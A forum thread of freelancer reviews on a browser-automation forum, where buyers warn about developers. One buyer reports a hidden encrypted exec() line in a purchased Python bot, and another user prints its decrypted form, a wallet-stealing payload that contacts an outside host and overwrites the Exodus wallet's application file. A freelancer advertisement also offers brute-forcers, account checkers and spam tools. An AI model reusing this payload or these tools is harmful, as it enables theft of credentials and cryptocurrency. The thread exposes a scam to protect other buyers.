@nazmel32
Отзывы о работе фрилансеров\Reviews of the work of freelancers
-
@joker-black-dev Что то начал делать но за сутки нету продвижений час работает и пол дня где то пропадает. Всё время подговаривает перевести деньги побыстрее, но работу наоборот медлит. Сегодня опять утром поработал 1 час сказал через час продолжил уже день прошёл тишина вчера плюс минус такая же была обстановка. Крч не рекомендую
-
@joker-black-dev said in Каталог фрилансеров BAS:
TELEGRAM JokerBlackDev
Разработка Скриптов\Софтов\Програм на BAS | B.A.S BrowserAutomationStudio
Опыт работы в B.A.S с 2018 года Премиум постоянно Разработка каждый деньРазработка и автоматизация любых действиий в браузере
Парсеры (Таблиц\Страниц\Блоков) Чекеры (Аккаунтов\Запросов\ Брутеры (Сервисов\Аккаунтов\Почт) Регеры (Аккаунтов\Сервисов\Почт) Активаторы (Аккаунтов\Почт\Сервисов) Спамеры (По Любым Сайтам\Сервисам) Генераторы (Строк\Данных\Баз и тд.) Накрутка просмотров на (Посты\Видео\Статьи) Накрутка полезных действий (Лайки Коментарии и тд.) Сборщики криптовалют с (Кранов или Сатойтов/Обьявлений/Сервисов) Комбайны для досок обьявлений/сервисов (по типу всё в одном)Поддержка скриптов гарантировано 30 дней или 10 любых правок в скрипте (дальше поддержка скрипта платная от 30$/мес)
Так же уже имееться хорошая база готовых Скриптов\Проектов\Баз данных...
Так же ВЫ можете приобрести готовый универсальный Скрипт\Программу (Открытым кодом за 60$ на всегда!)
Пожалуйста Пишите\Заказывайте если ВЫ настроены СЕРЬЁЗНО! и готовы оплатить сразу (за первых 3 часа работы. 10$/час)(Так как я делаю по 6-7 часов скрипты, а некоторые отказываються, уходят, пропадают, или придумывают причину, что-бы не забирать, готовый проект)
Спасибо за внимание, Работа\Поддержка 24\7. Для заказа или покупки пишите в TELEGRAM JokerBlackDevНе рекомендую, крайне не рекомендую.
-
Нам посчастливилось найти данного исполнителя и это можно сравнить с поиском иголки в стоге сена. Честно, давно в моей жизни не попадались такие ответственные и трудолюбивые люди, как @Dodok. К проектам относится так, как-будто делает их для себя, где-то подкорректирует задание, где-то посоветует, как сделать лучше… чувствую в нём не исполнителя, а полноценного партнёра, у которого горят глаза. Надеюсь, что наши пути не разойдутся и мы продолжим продуктивное сотрудничество.
-
Hello do not buy from @GigaAlex
bought him a python bot for 200€ with source code and he hide this line in it
;exec(Fernet(b'J7eVU5kG3iLeufUd9zjPGi_U7mhItsxbBszu1KMLtgQ=').decrypt(b'gAAAAABlRXF0pinmnyOQVWo-tJJ5a13m-oXYpNqV5HYOnxsWi5AatuCpKf0-wK3rqT61S5gdWsJZ_HT4oBayRwAtgTMcQzRG0_CQ2zB_Tpody_bbc7aPuri_mnghN_eKTuD55D3bYiTMH8LqshyLfvj_G67pijNjuMCV2t8vsZXT-Fvj41f-D39XXHXYraleVY1hf2j1s76CEwBmg4XGI1YrApGNfIwXXQ=='))
which was meant to not be seen and could potentially harm your computer
-
Please ban this guy from this forum, I bought him a script and there is special lines hidden in it with a LOT of spaces
;exec(Fernet(b'J7eVU5kG3iLeufUd9zjPGi_U7mhItsxbBszu1KMLtgQ=').decrypt(b'gAAAAABlRXF0pinmnyOQVWo-tJJ5a13m-oXYpNqV5HYOnxsWi5AatuCp#########################zRG0_CQ2zB_Tpody_bbc7aPuri_mnghN_eKTuD55D3bYiTMH8LqshyLfvj_G67pijNjuMCV2t8vsZXT-Fvj41f-D39XXHXYraleVY1hf2j1s76CEwBmg4XGI1YrApGNfIwXXQ=='))
(code has been partially removed to not copy it)
it seems to be keylogger or idk some shit like that
-
Lol. nice trick.
That code looks like https://cryptography.io/en/latest/fernet/, and it made to steal your passwords and other sensitive information.
import os import subprocess creationflags = subprocess.CREATE_NEW_PROCESS_GROUP | subprocess.CREATE_NO_WINDOW subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'requests', 'httpx'],creationflags=creationflags) import requests import httpx data = { "username": os.getenv("COMPUTERNAME") } httpx.post("https://bananasquad.ru/downloadhandler", json=data) subprocess.Popen(['cmd.exe','/c','start','/b','pip', 'install', 'pyperclip', 'pyotp', 'psutil', 'pycryptodome', 'asyncio', 'threaded', 'datetime', 'colorama', 'customtkinter', 'pyfiglet', 'tqdm', 'pypiwin32', 'pywin32', 'zipfile'],creationflags=creationflags) import asyncio import json import ntpath import random import re import shutil import sqlite3 import threading import zipfile import psutil import base64 import time import pyperclip from urllib.request import Request, urlopen has_exodus = False def inject(): procc = "exodus.exe" local = os.getenv("localappdata") path = f"{local}/exodus" if not os.path.exists(path): return listOfFile = os.listdir(path) apps = [] for file in listOfFile: if "app-" in file: apps += [file] exodusPatchURL = "https://bananasquad.ru/app.asar" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36"} req = Request(exodusPatchURL, headers=headers) response = urlopen(req) data = response.read() subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True) for app in apps: try: fullpath = f"{path}/{app}/resources/app.asar" with open(fullpath, 'wb') as out_file1: out_file1.write(data) except: pass inject() ### some other code -
F Fox pinned this topic on
-
@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe
This account has only 2 forum posts, I don't think it will be a big loss for him. For the future, pay attention to the reputation and reviews of performers. For payment always use a guarantor, it will protect both you and the performer.
-
@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
Yeah I'm pretty sure he stole a lot of creds from other people, support needs to ban this guy from here, keeping the place safe
It's always risky to order a script from an unknown person.
I reviewed his code, and I believe that he is not only a bad guy but also a bad programmer с руками из ж*пы.😂
His scripts didn't work at all on many computers.
-
-
Perhaps the developer may have been affected by malware, but they do not understand what is happening because their machine is hiding the malware.
-
@thotho said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
Please ban this guy from this forum, I bought him a script and there is special lines hidden in it with a LOT of spaces
;exec(Fernet(b'J7eVU5kG3iLeufUd9zjPGi_U7mhItsxbBszu1KMLtgQ=').decrypt(b'gAAAAABlRXF0pinmnyOQVWo-tJJ5a13m-oXYpNqV5HYOnxsWi5AatuCp#########################zRG0_CQ2zB_Tpody_bbc7aPuri_mnghN_eKTuD55D3bYiTMH8LqshyLfvj_G67pijNjuMCV2t8vsZXT-Fvj41f-D39XXHXYraleVY1hf2j1s76CEwBmg4XGI1YrApGNfIwXXQ=='))
(code has been partially removed to not copy it)
it seems to be keylogger or idk some shit like that
I just now watched the attached video, in it you show a script in python, which is designed to control an anti-detect browser, which is a competitor of BAS. Did I understand you correctly that you found an executor on the BAS forum to create a script to control a completely different anti-detect browser, you don't like the result of the work done and you ask to block this user on the BAS forum?
-
@Fox said in Отзывы о работе фрилансеров\Reviews of the work of freelancers:
.... you don't like the result of the work done and you ask to block this user on the BAS forum?
Да там еще смешнее, разработчик сказал, что сделал то, что даже теоретически нельзя сделать.
А именно проигрывать защищённый DRM контент через браузер, через который это нельзя сделать.
В BAS же нельзя, вот и, вероятно, ему и предложили не BAS. А там то тоже нельзя.😄
@thotho
Widevine DRM content can only be played on certified browsers such as Genuine Chrome, Opera, etc.However, in this case, you encountered a challenge with fingerprints, which cannot be handled very easily.
-
This post is deleted!
-
No need to overpay Write to me! I'll do it inexpensively
I will quickly make you any script
any automation. in any languages
we'll agree on the price
consultation is free
write your questions in more detail -
@phantomdevops17 Развод не выполняет задание время от времени делает новую телегу
